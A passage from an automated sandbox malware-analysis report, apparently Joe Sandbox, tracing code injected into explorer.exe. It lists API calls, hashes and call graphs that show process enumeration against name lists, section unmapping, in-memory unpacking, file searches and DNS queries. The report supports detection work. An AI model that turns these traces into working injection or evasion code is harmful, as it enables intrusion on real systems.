                                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                                      • Opcode ID: f1bf1b6419b8737fa1bfd164540b306d9ebd12ff430b725e17993a2e567bb455
                                                                                                                                                      • Instruction ID: 1edaea909f03bc6a13c539487536eaabe3d6d4dc2cbad4e9c989517273cda6fa
                                                                                                                                                      • Opcode Fuzzy Hash: f1bf1b6419b8737fa1bfd164540b306d9ebd12ff430b725e17993a2e567bb455
                                                                                                                                                      • Instruction Fuzzy Hash: 46318E72701216BFCB28CF29CC84BA6B7E8FF15354B1945ACE856C7601D772E865CBA0
                                                                                                                                                      Function 001612AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 001612BC
                                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 001612CE
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 001612E1
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001612F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                                      • Opcode ID: 9e47a38d83782686d0508d3f8332c4d18d453621549a1c235e491becbc4648d0
                                                                                                                                                      • Instruction ID: 16b9d4f96d99e659710b79b1ae723e90a568a43be9847729d742ebf1d43b78ff
                                                                                                                                                      • Opcode Fuzzy Hash: 9e47a38d83782686d0508d3f8332c4d18d453621549a1c235e491becbc4648d0
                                                                                                                                                      • Instruction Fuzzy Hash: 0AF09071846228FF9B10CFA4AD848FEB76CEB02251F24426AF901D2140D7714E4196A1
                                                                                                                                                      Function 001632F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(00166038), ref: 00163332
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(00166038), ref: 00163358
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                      • String ID: POST
                                                                                                                                                      • API String ID: 3168844106-1814004025
                                                                                                                                                      • Opcode ID: 8f7a920ad361cf1d2ce6115e5003ef7b02eafc7d206201891ce073b39ee6211f
                                                                                                                                                      • Instruction ID: b5b258318808957badac2cbcf4b6debc56b18feb0aab73621a321d230df57b20
                                                                                                                                                      • Opcode Fuzzy Hash: 8f7a920ad361cf1d2ce6115e5003ef7b02eafc7d206201891ce073b39ee6211f
                                                                                                                                                      • Instruction Fuzzy Hash: 7F01AF31500114FBCB252F60EC4C89F7FA9FF857B67184020F91A96262DF31DDA1DAA1

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.9%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:42%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:50
                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                      execution_graph 1528 9ed5da 1529 9ed614 1528->1529 1530 9ed91d 1529->1530 1533 9ed748 1529->1533 1534 9ed74d 1533->1534 1535 9ed835 LoadLibraryA 1534->1535 1537 9ed884 VirtualProtect VirtualProtect 1534->1537 1539 9ed6f8 1534->1539 1535->1534 1538 9ed912 1537->1538 1487 9ed748 1488 9ed74d 1487->1488 1489 9ed835 LoadLibraryA 1488->1489 1491 9ed884 VirtualProtect VirtualProtect 1488->1491 1493 9ed879 1488->1493 1489->1488 1492 9ed912 1491->1492 1540 9ed637 1541 9ed62e 1540->1541 1542 9ed91d 1541->1542 1543 9ed748 3 API calls 1541->1543 1544 9ed6f8 1543->1544 1494 9e4914 1506 9e1d08 CreateToolhelp32Snapshot 1494->1506 1497 9e1d08 4 API calls 1498 9e4941 1497->1498 1499 9e1d08 4 API calls 1498->1499 1500 9e494d SleepEx 1499->1500 1501 9e4962 1500->1501 1503 9e49e0 1501->1503 1512 9e1eb4 1501->1512 1502 9e4a18 1503->1502 1504 9e1eb4 6 API calls 1503->1504 1504->1502 1507 9e1d2c Process32First 1506->1507 1508 9e1d7a 1506->1508 1510 9e1d44 1507->1510 1508->1497 1509 9e1d71 CloseHandle 1509->1508 1510->1509 1511 9e1d5f Process32Next 1510->1511 1511->1510 1520 9e1db0 1512->1520 1514 9e1ed6 1515 9e1efd FindFirstFileW 1514->1515 1516 9e1f8f 1515->1516 1519 9e1f14 1515->1519 1516->1501 1517 9e1f74 FindNextFileW 1518 9e1f86 FindClose 1517->1518 1517->1519 1518->1516 1519->1517 1521 9e1dde 1520->1521 1522 9e1dfb FindFirstFileW 1521->1522 1523 9e1e8e 1522->1523 1526 9e1e12 1522->1526 1523->1514 1524 9e1e73 FindNextFileW 1525 9e1e85 FindClose 1524->1525 1524->1526 1525->1523 1526->1524 1527 9e1eb4 3 API calls 1526->1527 1527->1526

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_009E3D9C 1 Function_009E299C 2 Function_009E2298 3 Function_009E4094 47 Function_009E3FF8 3->47 73 Function_009E1A04 3->73 83 Function_009E1838 3->83 116 Function_009E1860 3->116 4 Function_009E3094 13 Function_009E2F88 4->13 4->83 4->116 5 Function_009ECD92 6 Function_009E3A90 12 Function_009E268C 6->12 52 Function_009E18E8 6->52 64 Function_009E2214 6->64 6->116 7 Function_009E3690 7->73 8 Function_009E3B8C 8->52 8->73 93 Function_009E345C 8->93 99 Function_009E3B48 8->99 9 Function_009E188C 9->83 10 Function_009E1A8C 11 Function_009E1D8C 12->83 111 Function_009E2368 12->111 12->116 14 Function_009E6188 15 Function_009E2F84 16 Function_009E1C80 17 Function_009E4280 17->73 17->83 17->116 18 Function_009E4680 18->17 44 Function_009E3FC0 18->44 51 Function_009E1BE8 18->51 19 Function_009E4C80 19->0 19->10 34 Function_009E28D4 19->34 19->51 58 Function_009E211C 19->58 19->83 105 Function_009E277C 19->105 19->116 20 Function_009ED0BB 21 Function_009E4BB8 22 Function_009ECFB7 23 Function_009E1EB4 23->11 27 Function_009E1DB0 23->27 23->83 23->116 24 Function_009E14B2 25 Function_009E4BB0 26 Function_009E1FB0 27->11 27->23 27->83 27->116 28 Function_009E3CAC 28->93 29 Function_009E4AA9 30 Function_009E44A4 30->3 30->44 50 Function_009E3CF0 30->50 31 Function_009E4BA0 32 Function_009E1CA0 33 Function_009ED5DA 100 Function_009ED748 33->100 34->51 81 Function_009E2838 34->81 95 Function_009E2754 34->95 35 Function_009E1FD4 35->26 35->35 35->83 35->116 36 Function_009E14D4 37 Function_009E18D0 38 Function_009E1CD0 39 Function_009E72D0 40 Function_009E1BC8 41 Function_009ED4C4 42 Function_009ED0C3 43 Function_009E29C0 45 Function_009E35FC 45->51 45->116 46 Function_009E18F8 47->73 48 Function_009E14F9 49 Function_009E3AF0 49->45 60 Function_009E3818 49->60 50->8 50->28 50->49 50->51 79 Function_009E343C 50->79 80 Function_009E3C3C 50->80 89 Function_009E3424 50->89 53 Function_009E21E4 54 Function_009ECCE2 55 Function_009E45E0 55->17 55->44 55->51 56 Function_009E4B1E 57 Function_009E311C 59 Function_009E141D 60->7 60->37 60->52 60->53 68 Function_009E370C 60->68 60->73 60->83 60->116 61 Function_009ED416 62 Function_009E4914 62->23 71 Function_009E1D08 62->71 62->83 62->116 63 Function_009E2B14 64->83 65 Function_009E4C14 66 Function_009E2F10 66->83 67 Function_009E4710 67->3 67->37 67->44 67->47 67->50 67->51 67->52 67->73 68->73 69 Function_009ECC0D 70 Function_009ED70A 71->38 72 Function_009E1508 74 Function_009E5104 74->16 74->32 74->40 74->51 74->73 77 Function_009E2C00 74->77 82 Function_009E1938 74->82 74->83 88 Function_009E1C28 74->88 91 Function_009E3F20 74->91 108 Function_009E1B74 74->108 75 Function_009E1405 76 Function_009E5300 76->19 76->51 76->74 76->76 76->83 77->43 77->51 77->63 78 Function_009E1000 80->52 80->93 80->99 84 Function_009ED637 84->100 85 Function_009E4B2E 86 Function_009E4C2E 87 Function_009ED42D 90 Function_009E1822 97 Function_009E3E4C 91->97 92 Function_009E4B5E 93->9 93->51 93->83 94 Function_009E4C5C 96 Function_009E1254 97->83 97->116 98 Function_009E3048 98->83 99->66 104 Function_009E317C 99->104 100->70 101 Function_009E4C42 102 Function_009E4540 102->17 102->44 102->51 103 Function_009ED57E 104->4 104->37 104->57 104->98 104->116 105->37 105->95 112 Function_009E2964 105->112 106 Function_009E4A7C 107 Function_009E1576 109 Function_009E4B6F 110 Function_009E156C 111->2 111->9 111->37 111->46 111->82 111->83 111->116 112->1 113 Function_009ECD63 114 Function_009E3F60 114->12 114->52 114->64 114->116 115 Function_009E1560 116->51

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 009E1DB0 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE ref: 009E1E03
                                                                                                                                                      • FindNextFileW.KERNELBASE ref: 009E1E7B
                                                                                                                                                      • FindClose.KERNELBASE ref: 009E1E88
                                                                                                                                                        • Part of subcall function 009E1EB4: FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                        • Part of subcall function 009E1EB4: FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                        • Part of subcall function 009E1EB4: FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                      • Instruction ID: f26ab08571aa78db495bcd119fda67d5812ac12626327416982b44708a9a98a2
                                                                                                                                                      • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                      • Instruction Fuzzy Hash: 69218F3021CE484BDB59EB2DA89936D77D1EBD8350F40066DF98EC3296DE389D058785
                                                                                                                                                      Function 009E1EB4 Relevance: 4.6, APIs: 3, Instructions: 94fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009E1DB0: FindFirstFileW.KERNELBASE ref: 009E1E03
                                                                                                                                                        • Part of subcall function 009E1DB0: FindNextFileW.KERNELBASE ref: 009E1E7B
                                                                                                                                                        • Part of subcall function 009E1DB0: FindClose.KERNELBASE ref: 009E1E88
                                                                                                                                                      • FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                      • FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                      • FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                      • Instruction ID: e343e84cc597d1d38789d4f34e25b0c21cbe56df5b715513f0e4f603ab935252
                                                                                                                                                      • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                      • Instruction Fuzzy Hash: 3D21217020CA484FDF45FF29989976D77E1EBE8344F000A6DA55AC3292DF38D9448785
                                                                                                                                                      Function 009E5300 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 137 9e5300-9e5310 call 9e1be8 140 9e5312-9e5345 call 9e1838 137->140 141 9e5390-9e5395 137->141 145 9e5347 call 9e1838 140->145 146 9e5371-9e538a NtUnmapViewOfSection 140->146 150 9e534c-9e5365 145->150 148 9e539c-9e53ab call 9e5104 146->148 149 9e538c-9e538e 146->149 156 9e53ad-9e53b0 call 9e5300 148->156 157 9e53b5-9e53be 148->157 149->141 151 9e5396-9e539b call 9e4c80 149->151 150->146 151->148 156->157
                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009E5378
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                      • Instruction ID: f1a8d33700c31467a28933c0e72e64857587143cc0ab9709ade113b45b729f5a
                                                                                                                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                      • Instruction Fuzzy Hash: C611C630605D898FEB5EF7BA54993793399EB54305F64053AE415C72A6DA39CE808301
                                                                                                                                                      Function 009E1D08 Relevance: 6.0, APIs: 4, Instructions: 47processCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                      • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                      • Instruction ID: f8c2e1b2851a1b5218f726e017160d59061733b9ac1cb237a61d3dd8869ca1a8
                                                                                                                                                      • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                      • Instruction Fuzzy Hash: DA014F30208A488FD756EB29DC887AE76E2FBD8315F104A2DA15AC6194DB38D9858B45
                                                                                                                                                      Function 009ED748 Relevance: 4.7, APIs: 3, Instructions: 246memorylibraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 10 9ed748-9ed74b 11 9ed755-9ed759 10->11 12 9ed75b-9ed763 11->12 13 9ed765 11->13 12->13 14 9ed74d-9ed753 13->14 15 9ed767 13->15 14->11 16 9ed76a-9ed771 15->16 18 9ed77d 16->18 19 9ed773-9ed77b 16->19 18->16 20 9ed77f-9ed782 18->20 19->18 21 9ed797-9ed7a4 20->21 22 9ed784-9ed792 20->22 34 9ed7be-9ed7cc call 9ed70a 21->34 35 9ed7a6-9ed7a8 21->35 23 9ed7ce-9ed7e9 22->23 24 9ed794-9ed795 22->24 25 9ed81a-9ed81d 23->25 24->21 27 9ed81f-9ed820 25->27 28 9ed822-9ed829 25->28 31 9ed801-9ed805 27->31 29 9ed82f-9ed833 28->29 32 9ed884-9ed88d 29->32 33 9ed835-9ed84e LoadLibraryA 29->33 36 9ed7eb-9ed7ee 31->36 37 9ed807-9ed80a 31->37 41 9ed890-9ed899 32->41 39 9ed84f-9ed856 33->39 34->11 42 9ed7ab-9ed7b2 35->42 36->28 40 9ed7f0 36->40 37->28 43 9ed80c-9ed810 37->43 39->29 45 9ed858-9ed86e 39->45 46 9ed7f1-9ed7f5 40->46 47 9ed8be-9ed90e VirtualProtect * 2 41->47 48 9ed89b-9ed89d 41->48 57 9ed7bc 42->57 58 9ed7b4-9ed7ba 42->58 43->46 49 9ed812-9ed819 43->49 61 9ed879-9ed883 45->61 62 9ed870-9ed877 45->62 46->31 50 9ed7f7-9ed7f9 46->50 54 9ed912-9ed917 47->54 51 9ed89f-9ed8ae 48->51 52 9ed8b0-9ed8bc 48->52 49->25 50->31 56 9ed7fb-9ed7ff 50->56 51->41 52->51 54->54 59 9ed919-9ed928 54->59 56->31 56->37 57->34 57->42 58->57 62->39
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 009ED847
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009ED8E5
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009ED903
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 009EC000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9ec000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                      • Instruction ID: 918dc47188e7a3b0eacc97db5b123e1354604a9cccb34aae78f8c69a84e37ee7
                                                                                                                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                      • Instruction Fuzzy Hash: AE51CB3235999E4BCB26AB3D9CC03F5B7C5F759321B180A3AC48AC3285EA59CC4683C1
                                                                                                                                                      Function 009E1B74 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 108 9e1b74-9e1b94 OpenFileMappingA 109 9e1b96-9e1bb4 MapViewOfFile 108->109 110 9e1bb7-9e1bc4 108->110 109->110
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                      • Instruction ID: 9bb27058a441f730cb39bf213baf2be580a35fdc31787113ddf811c61f090aeb
                                                                                                                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                      • Instruction Fuzzy Hash: B6F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B048A7EA84AC7164EF34C8808701
                                                                                                                                                      Function 009E4914 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 111 9e4914-9e496f call 9e1d08 * 3 SleepEx call 9e1838 120 9e4977-9e4979 111->120 121 9e497b-9e498e 120->121 122 9e49e0-9e49f4 120->122 127 9e4994-9e49de call 9e1838 call 9e1eb4 call 9e1860 121->127 125 9e4a18-9e4a2f 122->125 126 9e49f6-9e4a13 call 9e1eb4 122->126 126->125 127->122
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009E1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 009E1D1D
                                                                                                                                                        • Part of subcall function 009E1D08: Process32First.KERNEL32 ref: 009E1D3C
                                                                                                                                                        • Part of subcall function 009E1D08: CloseHandle.KERNELBASE ref: 009E1D74
                                                                                                                                                        • Part of subcall function 009E1D08: Process32Next.KERNEL32 ref: 009E1D67
                                                                                                                                                      • SleepEx.KERNELBASE ref: 009E4952
                                                                                                                                                        • Part of subcall function 009E1EB4: FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                        • Part of subcall function 009E1EB4: FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                        • Part of subcall function 009E1EB4: FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1868932505-0
                                                                                                                                                      • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                      • Instruction ID: ab1c34eb40973740779adc164f053eb8b185fe63e530dc4ec4c12a2e15d3af1a
                                                                                                                                                      • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                      • Instruction Fuzzy Hash: 79318831618A488FDB5AEF69E8956EE73D2FBD8301B10462EE447C3161DE749D4187C0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:10.3%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:306
                                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                                      execution_graph 987 862806 VirtualFree 988 861eb6 989 861ecc lstrlen 988->989 990 861ed9 988->990 989->990 999 862861 GetProcessHeap RtlAllocateHeap 990->999 992 861ee1 lstrcat 993 861f16 lstrcat 992->993 994 861f1d 992->994 993->994 1000 861f4a 994->1000 997 862843 3 API calls 998 861f40 997->998 999->992 1034 8622b8 1000->1034 1004 861f77 1039 8627e2 lstrlen MultiByteToWideChar 1004->1039 1006 861f86 1040 862374 RtlZeroMemory 1006->1040 1009 861fd8 RtlZeroMemory 1011 86200d 1009->1011 1010 862843 3 API calls 1012 861f2d 1010->1012 1013 86203b 1011->1013 1015 86229a 1011->1015 1042 8622e5 1011->1042 1012->997 1017 862280 1013->1017 1051 862861 GetProcessHeap RtlAllocateHeap 1013->1051 1015->1010 1016 862843 3 API calls 1016->1015 1017->1015 1017->1016 1019 86210b wsprintfW 1020 862131 1019->1020 1024 86219e 1020->1024 1052 862861 GetProcessHeap RtlAllocateHeap 1020->1052 1022 86216b wsprintfW 1022->1024 1023 86225d 1025 862843 3 API calls 1023->1025 1024->1023 1053 862861 GetProcessHeap RtlAllocateHeap 1024->1053 1027 862271 1025->1027 1027->1017 1028 862843 3 API calls 1027->1028 1028->1017 1029 862256 1032 862843 3 API calls 1029->1032 1030 8621e9 1030->1029 1054 862815 VirtualAlloc 1030->1054 1032->1023 1033 862243 RtlMoveMemory 1033->1029 1035 8622c2 1034->1035 1037 861f69 1034->1037 1036 8626e6 2 API calls 1035->1036 1036->1037 1038 862861 GetProcessHeap RtlAllocateHeap 1037->1038 1038->1004 1039->1006 1041 861f96 1040->1041 1041->1009 1041->1015 1043 862353 1042->1043 1045 8622f2 1042->1045 1043->1013 1044 8622f6 DnsQuery_W 1044->1045 1045->1043 1045->1044 1046 862335 DnsFree inet_ntoa 1045->1046 1046->1045 1047 862355 1046->1047 1055 862861 GetProcessHeap RtlAllocateHeap 1047->1055 1049 86235f 1056 8627e2 lstrlen MultiByteToWideChar 1049->1056 1051->1019 1052->1022 1053->1030 1054->1033 1055->1049 1056->1043 1057 861425 1058 861432 1057->1058 1059 86144b 1057->1059 1060 862608 VirtualQuery 1058->1060 1061 86143a 1060->1061 1061->1059 1062 861493 23 API calls 1061->1062 1062->1059 708 861000 709 861007 708->709 710 861010 708->710 712 861016 709->712 762 862608 VirtualQuery 712->762 715 861097 715->710 717 86102c RtlMoveMemory 718 861071 GetCurrentProcessId 717->718 719 86104d 717->719 723 861092 718->723 724 86109e 718->724 799 862861 GetProcessHeap RtlAllocateHeap 719->799 721 861052 RtlMoveMemory 721->718 723->715 725 861095 723->725 765 8610a4 724->765 800 861332 725->800 727 8610a3 729 862861 GetProcessHeap RtlAllocateHeap 727->729 730 8610cc 729->730 731 8610dc CreateToolhelp32Snapshot 730->731 732 861322 Sleep 731->732 733 8610f0 Process32First 731->733 732->731 734 86110c lstrcmpiA 733->734 735 86131b CloseHandle 733->735 736 861124 lstrcmpiA 734->736 758 861280 734->758 735->732 738 861138 lstrcmpiA 736->738 736->758 737 8625ad OpenProcess IsWow64Process IsWow64Process CloseHandle 737->758 739 86114c lstrcmpiA 738->739 738->758 740 861160 lstrcmpiA 739->740 739->758 742 861170 lstrcmpiA 740->742 740->758 741 861305 Process32Next 741->734 743 861319 741->743 744 861184 lstrcmpiA 742->744 742->758 743->735 745 861198 lstrcmpiA 744->745 744->758 746 8611ac lstrcmpiA 745->746 745->758 747 8611c0 lstrcmpiA 746->747 746->758 748 8611d4 lstrcmpiA 747->748 747->758 749 8611e8 lstrcmpiA 748->749 748->758 751 8611fc lstrcmpiA 749->751 749->758 750 862608 VirtualQuery 750->758 752 86120c lstrcmpiA 751->752 751->758 754 86121c lstrcmpiA 752->754 752->758 753 8612ae lstrcmpiA 753->758 755 86122c lstrcmpiA 754->755 754->758 757 86123c lstrcmpiA 755->757 755->758 756 861819 30 API calls 756->758 757->758 759 86124c lstrcmpiA 757->759 758->737 758->741 758->750 758->753 758->756 759->758 760 86125c lstrcmpiA 759->760 760->758 761 86126c lstrcmpiA 760->761 761->741 761->758 763 86101e 762->763 763->715 764 862861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 862861 GetProcessHeap RtlAllocateHeap 765->827 767 8610cc 768 8610dc CreateToolhelp32Snapshot 767->768 769 861322 Sleep 768->769 770 8610f0 Process32First 768->770 769->768 771 86110c lstrcmpiA 770->771 772 86131b CloseHandle 770->772 773 861124 lstrcmpiA 771->773 774 861280 771->774 772->769 773->774 776 861138 lstrcmpiA 773->776 779 861305 Process32Next 774->779 788 862608 VirtualQuery 774->788 791 8612ae lstrcmpiA 774->791 828 8625ad OpenProcess 774->828 834 861819 774->834 776->774 777 86114c lstrcmpiA 776->777 777->774 778 861160 lstrcmpiA 777->778 778->774 780 861170 lstrcmpiA 778->780 779->771 781 861319 779->781 780->774 782 861184 lstrcmpiA 780->782 781->772 782->774 783 861198 lstrcmpiA 782->783 783->774 784 8611ac lstrcmpiA 783->784 784->774 785 8611c0 lstrcmpiA 784->785 785->774 786 8611d4 lstrcmpiA 785->786 786->774 787 8611e8 lstrcmpiA 786->787 787->774 789 8611fc lstrcmpiA 787->789 788->774 789->774 790 86120c lstrcmpiA 789->790 790->774 792 86121c lstrcmpiA 790->792 791->774 792->774 793 86122c lstrcmpiA 792->793 793->774 795 86123c lstrcmpiA 793->795 795->774 796 86124c lstrcmpiA 795->796 796->774 797 86125c lstrcmpiA 796->797 797->774 798 86126c lstrcmpiA 797->798 798->774 798->779 799->721 880 862861 GetProcessHeap RtlAllocateHeap 800->880 802 861340 GetModuleFileNameA 881 862861 GetProcessHeap RtlAllocateHeap 802->881 804 861357 GetCurrentProcessId wsprintfA 882 86263e CryptAcquireContextA 804->882 807 86139c Sleep 887 8624d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 86140d 905 862843 808->905 812 8613ae GetModuleHandleA GetProcAddress 814 8613da GetModuleHandleA GetProcAddress 812->814 815 8613c9 812->815 813 862843 3 API calls 816 86141b RtlExitUserThread 813->816 818 861406 814->818 819 